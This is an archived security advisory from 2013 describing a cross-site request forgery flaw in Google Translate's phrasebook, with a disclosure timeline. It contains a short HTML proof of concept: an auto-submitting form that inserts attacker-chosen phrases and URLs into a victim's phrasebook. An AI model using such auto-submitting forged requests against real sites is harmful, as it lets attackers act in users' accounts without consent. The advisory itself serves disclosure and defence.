what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Google Translate Cross Site Request Forgery

Google Translate Cross Site Request Forgery
Posted Jun 21, 2013
Authored by Ivano Binetti

Google Translate suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 12c75e42342e2b5192e105b93d358210a34123108e4400ed7ac334119313f625

Google Translate Cross Site Request Forgery

Change Mirror Download
+------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Google Translate CSRF Vulnerability
# Date : 06/20/2013
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Affected Web site : http://translate.google.com
# Original Advisory: : http://www.webapp-security.com/2013/06/translate-google-com-csrf-vulnerability/
# Updates : http://www.webapp-security.com/2013/09/google-translate-csrf-part-2/
+------------------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Vulnerability Description
2)Exploit
3)Vulnerability Timeline
+------------------------------------------------------------------------------------------------------------------------------------------+
1)Vulnerability Description
I discovered a new CSRF vulnerability on translate.google.com web site which could allow an attacker to insert items (Words/Phrases/Urls
and related translations) into the user's Phrasebook. Furthermore an attacker could also inserta potentially malicious Urls - into the
above mentioned Phrasebook - towards which the victim could be redirected simply clicking on the "Go to <website>" right-click option on
translate.google.com.
The vulnerability is related to a problem into the generation of the "xt" anti-CSRF token which is not correctly associated with the user session,
allowing to use any previous generated anti-CSRF parameter - for that specific user- in order to carry out this attack.

2)Exploit
Following a simply exploit in order to insert, into a Phrasebook, the new phrase "word_example" and the url "www.ivanobinetti.com" (my blog)
as translation:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://translate.google.com/translate_a/sg?client=t&cm=a&sl=en&tl=it&ql=4&hl=en&xt=<anti-CSRF token">
<input type="hidden" name="q" value="word_example"/>
<input type="hidden" name="utrans" value="www.ivanobinetti.com"/>
</form>
</body>
</html>

Note: executing the exploit the victim will receive the message to open or download a "sg" file. Even if the victim does not open or
download this file the new item will be added into the Phrasebook.

3)Vulnerability Timeline
04/12/2013: Exploit has been sent to Google security team (security@google.com)
04/12/2013: First prompt reply from Google security team telling me that the exploit does not work
04/12/2013: My reply explaining the details of the vulnerability and related exploit
04/13/2013: Google security team contacted me admitting the vulnerability and that they were considering if assign me a reward
04/17/2013: Google security team told me that the vulnerability/problem was already known by Google and that no reward
there would been for me :(
06/20/2013: After more than 2 months I checked that the problem is still in place, so I decided to publish the vulnerability
08/15/2013: Google Security team contacted me in order to inform me that the vulnerability has been fixed and to ask me to check if
the vulnerability was correctly fixed.
09/01/2013: I've tested the vulnerability and - unfortunely - I've verified that it still affects Google translate. I've written an email
to Google Security team in order to inform them that the issue was not correctly patched and to share the results of my tests.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close